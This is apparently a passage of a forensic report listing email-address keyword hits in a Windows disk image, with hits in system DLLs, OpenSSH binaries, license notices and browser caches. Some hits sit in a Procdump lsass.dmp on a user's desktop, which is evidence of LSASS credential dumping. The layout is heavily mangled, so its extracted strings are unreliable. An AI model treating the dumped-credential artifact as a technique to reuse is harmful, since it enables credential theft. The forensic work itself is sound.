hambersignroot.crl0 /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-
«chambersignroot@chambersign. windows-crypt32-
org«0* chambersignroot@c dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/
crypt32.dll
[email protected]
T
a
Preview Source File
g
s
g/chambersroot.crl0 /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows
«[email protected] Defender/Scans/mpcache-
«0' chambersroot@cham 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin.5B
g/chambersroot.crl0 /
«[email protected] img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp
«0' chambersroot@cham
g/chambersroot.crl0 /
«[email protected] img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/l
«0' chambersroot@cham sass.dmp
g/chambersroot.crl0 /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll
«[email protected]
«0' chambersroot@cham
Page 57/145
T
a
Preview Source File
g
s
g/chambersroot.crl0 /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll
«[email protected]
«0' chambersroot@cham
g/chambersroot.crl0 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-
«[email protected] windows-crypt32-
«0' chambersroot@cham dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/
crypt32.dll
g/chambersroot.crl0 /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-
«[email protected] windows-crypt32-
«0' chambersroot@cham dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/
crypt32.dll
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
Page 58/145
T
a
Preview Source File
g
s
ES.DLL
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
scrie-mi pe /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected]« t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1
sau [email protected] e7da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
Page 59/145
T
a
Preview Source File
g
s
[email protected]
Ta
Preview Source File
gs
\wbem\net cim.dll /
x)«[email protected]« or,str ator ) img_disk.raw/vol_vol7/Windows/WinSxS/ManifestCache/4
*pdf v 20eca21891c0180_blobs.bin
[email protected]
T
a
Preview Source File
g
s
Page 60/145
[email protected]
Ta
Preview Source File
gs
[email protected]
Ta
Preview Source File
gs
nod , loca /
xmodif ]«[email protected]« img_disk.raw/vol_vol7/Windows/WinSxS/ManifestCache/4
vemovel(' ngd!'~, d 20eca21891c0180_blobs.bin
[email protected]
T
a
Preview Source File
g
s
Page 61/145
[email protected]
T
a
Preview Source File
g
s
ocs or by e-mail at /
«[email protected]«.0 img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsass.d
19k&ks n79u u>g| mp
Page 62/145
[email protected]
T
a
Preview Source File
g
s
[email protected]
Ta
Preview Source File
gs
10 francisco jerez /
<«[email protected]«> img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/One
permission is Drive/18.143.0717.0002/ThirdPartyNotices.txt
10 francisco jerez /
<«[email protected]«> img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/One
permission is Drive/18.143.0717.0002_1/ThirdPartyNotices.txt
[email protected]
T
a
Preview Source File
g
s
Page 63/145
T
a
Preview Source File
g
s
nistp256,
1 curve25519-sha256 /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh-
«curve25519- keyscan.exe
[email protected]« %s: %s
first_kex_fo
1 curve25519- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe
sha256,«curve25519-
[email protected]«,ecdh-sha2-
nistp256,
1 curve25519-sha256 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-
«curve25519- components-
[email protected]« %s: %s onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e
first_kex_fo 35c/ssh-keyscan.exe
1 curve25519- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-
sha256,«curve25519- components-
[email protected]«,ecdh-sha2- onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e
nistp256, 35c/ssh.exe
[email protected]
T
a
Preview Source File
g
s
Page 64/145
T
a
Preview Source File
g
s
following address: /
«[email protected] img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsa
om«.0 {0y0= 1http://cer ss.dmp
[email protected]
Ta
Preview Source File
gs
Page 65/145
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
Ta
Preview Source File
gs
Page 66/145
[email protected]
T
a
Preview Source File
g
s
7 daniel stenberg, /
<«[email protected]«>. img_disk.raw/vol_vol7/Windows/WinSxS/amd64_curl_31bf3856ad364e35
license https://c _10.0.17763.1_none_6f3199f47554443b/curl.exe
7 daniel stenberg, /
<«[email protected]«>. img_disk.raw/vol_vol7/Windows/WinSxS/wow64_curl_31bf3856ad364e3
license https://c 5_10.0.17763.1_none_79864446a9b50636/curl.exe
[email protected]
T
a
Preview Source File
g
s
Page 67/145
T
a
Preview Source File
g
s
designbindingpickernodeproject@designbindingpickernodeinstancesrdesignbin
dingpickertreeviewaccessiblename.desi
T
a
Preview Source File
g
s
dingpickernodeother<«designbindingpickernodeproj /
ect@designbindingpickernodeinstancesrdesignbindi img_disk.raw/vol_vol7/Windows/Microsoft.NET/
ngpickertreeviewaccessiblename.desi«gnerbatchcre Framework/v4.0.30319/System.Design.dll
atetool,
dingpickernodeother<«designbindingpickernodeproj /
ect@designbindingpickernodeinstancesrdesignbindi img_disk.raw/vol_vol7/Windows/Microsoft.NET/
ngpickertreeviewaccessiblename.desi«gnerbatchcre Framework64/v4.0.30319/System.Design.dll
atetool,
dingpickernodeother<«designbindingpickernodeproj /
ect@designbindingpickernodeinstancesrdesignbindi img_disk.raw/vol_vol7/Windows/Microsoft.NET/
ngpickertreeviewaccessiblename.desi«gnerbatchcre assembly/GAC_MSIL/System.Design/v4.0_4.0.
atetool, 0.0__b03f5f7f11d50a3a/System.Design.dll
dingpickernodeother<«designbindingpickernodeproj /
ect@designbindingpickernodeinstancesrdesignbindi img_disk.raw/vol_vol7/Windows/WinSxS/amd64
ngpickertreeviewaccessiblename.desi«gnerbatchcre _netfx4-
atetool, system.design_b03f5f7f11d50a3a_4.0.15713.0
_none_9127809ba0035806/System.Design.dll
dingpickernodeother<«designbindingpickernodeproj /
ect@designbindingpickernodeinstancesrdesignbindi img_disk.raw/vol_vol7/Windows/WinSxS/msil_s
ngpickertreeviewaccessiblename.desi«gnerbatchcre ystem.design_b03f5f7f11d50a3a_4.0.15713.0_
atetool, none_56142d2005a0523b/System.Design.dll
Page 68/145
[email protected]
Ta
Preview Source File
gs
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
Page 69/145
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 70/145
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
efortestingpurposes /img_disk.raw/vol_vol7/Program
«[email protected] Files/WindowsApps/Microsoft.MicrosoftOfficeHub_17.8918.5926.0_
nmicrosoft.com« {37cead57- x64__8wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
78e0-4c17 Shared/OFFICE16/MSO.DLL
[email protected]
T
a
Preview Source File
g
s
Page 71/145
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
. dirección: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected] t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1e
Page 72/145
T
a
Preview Source File
g
s
m« la producció 7da144/Alphabet.xml
[email protected]
Ta
Preview Source File
gs
[email protected]
Ta
Preview Source File
gs
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
Page 73/145
T
a
Preview Source File
g
s
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
Page 74/145
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 75/145
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 76/145
T
a
Preview Source File
g
s
Page 77/145
T
a
Preview Source File
g
s
8c478/ssh-add.exe
[email protected]
T
a
Preview Source File
g
s
Page 78/145
T
a
Preview Source File
g
s
nistp521
[email protected],«ecdsa- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe
sha2-nistp384-cert-
[email protected]«,ecdsa-sha2-
nistp521
[email protected],«ecdsa- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-
sha2-nistp384-cert- client-components-
[email protected]«,ecdsa-sha2- onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c
nistp521 7e35c/ssh.exe
Page 79/145
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 80/145
T
a
Preview Source File
g
s
nistp25
[email protected],«ecdsa- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe
sha2-nistp521-cert-
[email protected]«,ssh-ed25519-
cert-v0
Page 81/145
T
a
Preview Source File
g
s
[email protected],«ecdsa- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-
sha2-nistp521-cert- client-components-
[email protected]«,ssh-ed25519- onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c
cert-v0 7e35c/ssh.exe
[email protected]
T
a
Preview Source File
g
s
Page 82/145
T
a
Preview Source File
g
s
ssh-rs
Page 83/145
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
: einar lielmanis, /
<«[email protected]« img_disk.raw/vol_vol7/Windows/SystemApps/Microsoft.MicrosoftEdgeDe
> http://jsbeautifie vToolsClient_8wekyb3d8bbwe/23/common/monaco-
editor/min/vs/language/html/htmlWorker.js
Page 84/145
T
a
Preview Source File
g
s
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 85/145
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
email" /
placeholder="«email@exam img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Microsoft.
ple.com«" aria-label="email" MicrosoftEdge_8wekyb3d8bbwe/AC/#!
001/MicrosoftEdge/Cache/KBBFFLP4/en-us[1].htm
Page 86/145
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
yb /img_disk.raw/vol_vol7/Windows/Speech_OneCore/Engines/TTS/en-
>fc;n4{8w7d42ku;*«f8i2ue US/M1033Zira.SPEECHUX.NUS
[email protected]«="x.s8i
y; h[9dgg^^o4
yb /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
>fc;n4{8w7d42ku;*«f8i2ue t..peech-en-us-
[email protected]«="x.s8i onecore_31bf3856ad364e35_10.0.17763.1_none_ecc2dbcee106498b/
y; h[9dgg^^o4 M1033Zira.SPEECHUX.NUS
Page 87/145
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
Ta
Preview Source File
gs
Page 88/145
[email protected]
T
a
Preview Source File
g
s
[email protected]
Ta
Preview Source File
gs
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
[email protected]
Ta
Preview Source File
gs
Page 89/145
[email protected]
T
a
Preview Source File
g
s
ail>. eg. /
contosoid\«foo@contos img_disk.raw/vol_vol7/Windows/SysWOW64/en/AuthFWSnapIn.Resources
o.com« the online id was .dll
n
ail>. eg. /
contosoid\«foo@contos img_disk.raw/vol_vol7/Windows/System32/en/AuthFWSnapIn.Resources.d
o.com« the online id was ll
n
Page 90/145
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 91/145
T
a
Preview Source File
g
s
discusses bu x86__8wekyb3d8bbwe/ThirdPartyNotices.txt
ntation. o «freetype- /
[email protected]« img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDrive/1
discusse 8.143.0717.0002/ThirdPartyNotices.txt
ntation. o «freetype- /
[email protected]« img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDrive/1
discusse 8.143.0717.0002_1/ThirdPartyNotices.txt
[email protected]
Ta
Preview Source File
gs
freetype: o /img_disk.raw/vol_vol7/pagefile.sys
«[email protected]«
discusses
to freetype: o /img_disk.raw/vol_vol7/Program
«[email protected]« Files/WindowsApps/Microsoft.MicrosoftSolitaireCollection_4.1.5252.0_x8
discusses ge 6__8wekyb3d8bbwe/ThirdPartyNotices.txt
reetype: o /
«[email protected]« img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDrive/18.
discusse 143.0717.0002/ThirdPartyNotices.txt
reetype: o /
«[email protected]« img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDrive/18.
discusse 143.0717.0002_1/ThirdPartyNotices.txt
[email protected]
Ta
Preview Source File
gs
Page 92/145
[email protected]
T
a
Preview Source File
g
s
,"author":"segment /
<«[email protected]«> img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Microsoft.
","version":"3.9.0" MicrosoftEdge_8wekyb3d8bbwe/AC/#!
001/MicrosoftEdge/Cache/KBBFFLP4/analytics.min[1].js
[email protected]
T
a
Preview Source File
g
s
[email protected] /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/sftp.exe
«[email protected]«
[email protected]
[email protected] /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-
«[email protected]« components-
[email protected] onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e35
c/sftp.exe
[email protected]
T
a
Preview Source File
g
s
Page 93/145
T
a
Preview Source File
g
s
[email protected] /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/sftp.exe
«[email protected]«
server supports ext
[email protected] /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-
«[email protected]« components-
server supports ext onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e35
c/sftp.exe
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 94/145
[email protected]
T
a
Preview Source File
g
s
ntment.invitees /img_disk.raw/vol_vol7/Program
n:d}«[email protected]« Files/WindowsApps/microsoft.windowscommunicationsapps_17.9330.
hxdeviceid versiona 21365.0_x64__8wekyb3d8bbwe/HxComm.dll
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
.onmicrosoft.com of /img_disk.raw/vol_vol7/Program
«[email protected] Files/WindowsApps/Microsoft.MicrosoftOfficeHub_17.8918.5926.0_x64__8
m«. corrigeer de indel wekyb3d8bbwe/VFS/ProgramFilesCommonX64/Microsoft
Shared/OFFICE16/MSOIDRES.DLL
Page 95/145
[email protected]
T
a
Preview Source File
g
s
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 96/145
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
12 grigori goronzy /
<«[email protected]«> * * img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDrive/1
pe 8.143.0717.0002/ThirdPartyNotices.txt
12 grigori goronzy /
<«[email protected]«> * * img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDrive/1
pe 8.143.0717.0002_1/ThirdPartyNotices.txt
[email protected]
T
a
Preview Source File
g
s
Page 97/145
[email protected]
T
a
Preview Source File
g
s
rmissionsbyurlasync /img_disk.raw/vol_vol7/Program
«[email protected]« Files/WindowsApps/Microsoft.Office.OneNote_16001.10228.20003
shared document mod .0_x64__8wekyb3d8bbwe/msoimm.dll
savetolocationasync /img_disk.raw/vol_vol7/Program
«[email protected]« Files/WindowsApps/microsoft.windowscommunicationsapps_17.93
shared document mod 30.21365.0_x64__8wekyb3d8bbwe/msoimm.dll
[email protected]
Ta
Preview Source File
gs
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
envoyez-le là : /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected]« t..nputpersonalization_31bf3856ad364e35_10.0.17763.1_none_3071fcdb1e7
Page 98/145
T
a
Preview Source File
g
s
! richard : da144/Alphabet.xml
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected] /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/sftp.exe
«[email protected]«
[email protected] s
[email protected] /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-
«[email protected]« components-
[email protected] s onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e3
5c/sftp.exe
Page 99/145
[email protected]
T
a
Preview Source File
g
s
* thirumoorthy /img_disk.raw/vol_vol7/Windows/System32/drivers/rmcast.sys
(«[email protected].
edu«), aug 1995
* thirumoorthy /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
(«[email protected]. rmcast_31bf3856ad364e35_10.0.17763.1_none_4543b616e0146b6c/r
edu«), aug 1995 mcast.sys
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
Page 100/145
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 101/145
T
a
Preview Source File
g
s
keyscan.exe
[email protected]
T
a
Preview Source File
g
s
Page 102/145
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 103/145
T
a
Preview Source File
g
s
[email protected],«hmac- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe
[email protected]«,umac-
[email protected]
[email protected],«hmac- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-
[email protected]«,umac- components-
[email protected] onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7e
35c/ssh.exe
[email protected]
T
a
Preview Source File
g
s
Page 104/145
T
a
Preview Source File
g
s
[email protected],«hmac- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe
sha2-256-
[email protected]«,hmac-sha2-
512-etm@o
[email protected],«hmac- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-
sha2-256- components-
[email protected]«,hmac-sha2- onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7
512-etm@o e35c/ssh.exe
[email protected]
T
a
Preview Source File
g
s
Page 105/145
T
a
Preview Source File
g
s
[email protected],«hmac- /img_disk.raw/vol_vol7/Windows/System32/OpenSSH/ssh.exe
sha2-512-
[email protected]«,hmac-sha1-
etm@opens
[email protected],«hmac- /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_openssh-client-
sha2-512- components-
[email protected]«,hmac-sha1- onecore_31bf3856ad364e35_10.0.17763.1_none_f0c3262e74c7
etm@opens e35c/ssh.exe
[email protected]
T
a
Preview Source File
g
s
Page 106/145
[email protected]
T
a
Preview Source File
g
s
etkey /img_disk.raw/vol_vol7/Windows/SysWOW64/winipcfile.dll
virmipccrypt::«hrencryptcore__nos
[email protected]«
virmdocumentipcimpl
etkey /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-
virmipccrypt::«hrencryptcore__nos windows-r..ment-client-v2-
[email protected]« core_31bf3856ad364e35_10.0.17763.1_none_5133a422fa8e31
virmdocumentipcimpl 7d/winipcfile.dll
[email protected]
T
a
Preview Source File
g
s
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
Page 107/145
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
<a /img_disk.raw/vol_vol7/Windows/SysWOW64/en-US/mshtml.dll.mui
href="mailto:«iepo@micros
oft.com«">iepo@microsoft.
com
Page 108/145
T
a
Preview Source File
g
s
<a /img_disk.raw/vol_vol7/Windows/System32/en-US/mshtml.dll.mui
href="mailto:«iepo@micros
oft.com«">iepo@microsoft.
com
<a /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
href="mailto:«iepo@micros i..ng-legacy.resources_31bf3856ad364e35_11.0.17763.1_en-
oft.com«">iepo@microsoft. us_10cd95b58578bae4/mshtml.dll.mui
com
<a /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-
href="mailto:«iepo@micros i..ng-legacy.resources_31bf3856ad364e35_11.0.17763.1_en-
oft.com«">iepo@microsoft. us_1b224007b9d97cdf/mshtml.dll.mui
com
[email protected]
T
a
Preview Source File
g
s
Page 109/145
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
n1 dcssi1 igc/a1#0! /
«[email protected]«0 img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsas
021213142923z 2010 s.dmp
Page 110/145
T
a
Preview Source File
g
s
pt32.dll
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
Ta
Preview Source File
gs
Page 111/145
Ta
Preview Source File
gs
0eca21891c0180_blobs.bin
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
ac/anfserverca.crl0 /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows
«[email protected]«0 Defender/Scans/mpcache-
[email protected] yllm 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin.5B
ac/anfserverca.crl0 /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp
«[email protected]«0
[email protected] yllm
Page 112/145
T
a
Preview Source File
g
s
ac/anfserverca.crl0 /
«[email protected]«0 img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsass.dm
[email protected] yllm p
ac/anfserverca.crl0 /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll
«[email protected]«0
[email protected] yllm
ac/anfserverca.crl0 /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll
«[email protected]«0
[email protected] yllm
ac/anfserverca.crl0 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected]«0 crypt32-
[email protected] yllm dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/crypt32.
dll
ac/anfserverca.crl0 /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-
«[email protected]«0 crypt32-
[email protected] yllm dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/crypt32.
dll
[email protected]
T
a
Preview Source File
g
s
Page 113/145
[email protected]
T
a
Preview Source File
g
s
.ocsp.d-trust.net03 /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp
«[email protected]«
http://www.d-trust.
.ocsp.d-trust.net03 /
«[email protected]« img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsass.d
http://www.d-trust. mp
.ocsp.d-trust.net03 /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll
«[email protected]«
http://www.d-trust.
.ocsp.d-trust.net03 /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll
«[email protected]«
http://www.d-trust.
.ocsp.d-trust.net03 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected]« crypt32-
http://www.d-trust. dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/crypt32
.dll
.ocsp.d-trust.net03 /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-
«[email protected]« crypt32-
http://www.d-trust. dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/crypt32
.dll
[email protected]
T
a
Preview Source File
g
s
Page 114/145
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 115/145
T
a
Preview Source File
g
s
ce1 globaltrust1$0" /
«[email protected]«0 img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsass
060807141235z 3609 .dmp
[email protected]
T
a
Preview Source File
g
s
fax:0125/252524 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected]« a..ence-mitigations-
www.incomedia.it c1_31bf3856ad364e35_10.0.17763.1_none_fce8220f4a75d7c9/sysmain.s
db
Page 116/145
T
a
Preview Source File
g
s
fax:0125/252524 /img_disk.raw/vol_vol7/Windows/apppatch/sysmain.sdb
«[email protected]«
www.incomedia.it
[email protected]
T
a
Preview Source File
g
s
asteiz1 izenpe.com1 /
«[email protected]«0 img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsass
030130230000z 1801 .dmp
Page 117/145
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
) tanusitvanykiado1 /img_disk.raw/vol_vol7/ProgramData/Microsoft/Windows
«[email protected]«0 Defender/Scans/mpcache-
030330014711z 2212 3F8B6E8E40CCEDF3C2DD9B1556607E93976E5D46.bin.5B
) tanusitvanykiado1 /img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.dmp
«[email protected]«0
030330014711z 2212
) tanusitvanykiado1 /
«[email protected]«0 img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsass.
030330014711z 2212 dmp
) tanusitvanykiado1 /img_disk.raw/vol_vol7/Windows/SysWOW64/crypt32.dll
«[email protected]«0
030330014711z 2212
) tanusitvanykiado1 /img_disk.raw/vol_vol7/Windows/System32/crypt32.dll
«[email protected]«0
030330014711z 2212
Page 118/145
T
a
Preview Source File
g
s
) tanusitvanykiado1 /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected]«0 crypt32-
030330014711z 2212 dll_31bf3856ad364e35_10.0.17763.1_none_4c35abc135fd32d6/crypt
32.dll
) tanusitvanykiado1 /img_disk.raw/vol_vol7/Windows/WinSxS/wow64_microsoft-windows-
«[email protected]«0 crypt32-
030330014711z 2212 dll_31bf3856ad364e35_10.0.17763.1_none_568a56136a5df4d1/crypt
32.dll
[email protected]
T
a
Preview Source File
g
s
en vagy kerhetok az /
«[email protected]« e-mail img_disk.raw/vol_vol7/Users/Craig/Desktop/Procdump/lsass.zip/lsass.d
cimen. warni mp
Page 119/145
T
a
Preview Source File
g
s
2.dll
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 120/145
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
Page 121/145
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
Ta
Preview Source File
gs
Page 122/145
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
rtsetzen zu k nnen. /
«[email protected]« img_disk.raw/vol_vol7/Windows/System32/DriverStore/FileRepository/p
01/01/2000" 0-9 rnms002.inf_amd64_6d7ddeebcacd2a6d/Amd64/FXSRES.DLL
rtsetzen zu k nnen. /
«[email protected]« img_disk.raw/vol_vol7/Windows/System32/spool/drivers/x64/3/FXSRES
01/01/2000" 0-9 .DLL
Page 123/145
T
a
Preview Source File
g
s
rtsetzen zu k nnen. /
«[email protected]« img_disk.raw/vol_vol7/Windows/WinSxS/amd64_dual_prnms002.inf_31
01/01/2000" 0-9 bf3856ad364e35_10.0.17763.1_none_de4a75df21a850fc/Amd64/FXS
RES.DLL
[email protected]
T
a
Preview Source File
g
s
[email protected]
Ta
Preview Source File
gs
Page 124/145
Ta
Preview Source File
gs
mark adler /
«[email protected]« img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDrive/18.143
madler@alu .0717.0002/ThirdPartyNotices.txt
mark adler /
«[email protected]« img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Microsoft/OneDrive/18.143
madler@alu .0717.0002_1/ThirdPartyNotices.txt
[email protected]
Ta
Preview Source File
gs
[email protected]
T
a
Preview Source File
g
s
Page 125/145
T
a
Preview Source File
g
s
[email protected]
T
a
Preview Source File
g
s
ribe-tagline /
email">«john.smith@gmail. img_disk.raw/vol_vol7/Users/Alan/AppData/Local/Packages/Microsoft.
com«</span> </p> </div> MicrosoftEdge_8wekyb3d8bbwe/AC/#!
001/MicrosoftEdge/Cache/YATO9SWU/9QX61ZMY.dat
Page 126/145
[email protected]
T
a
Preview Source File
g
s
ct cancelhexamples: /img_disk.raw/vol_vol7/Windows/System32/en-US/RADCUI.dll.mui
«[email protected]«
https://contoso.com
/feed/webfeed.aspx /img_disk.raw/vol_vol7/Windows/System32/en-US/TSWorkspace.dll.mui
«[email protected]«
connection settings
ct cancelhexamples: /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected]« t..ce-radcui.resources_31bf3856ad364e35_10.0.17763.1_en-
https://contoso.com us_8919adcf64c1ba46/RADCUI.dll.mui
/feed/webfeed.aspx /img_disk.raw/vol_vol7/Windows/WinSxS/amd64_microsoft-windows-
«[email protected]« t..workspace.resources_31bf3856ad364e35_10.0.17763.1_en-
connection settings us_01b17dede968f8e3/TSWorkspace.dll.mui
[email protected]
T
a
Preview Source File
g
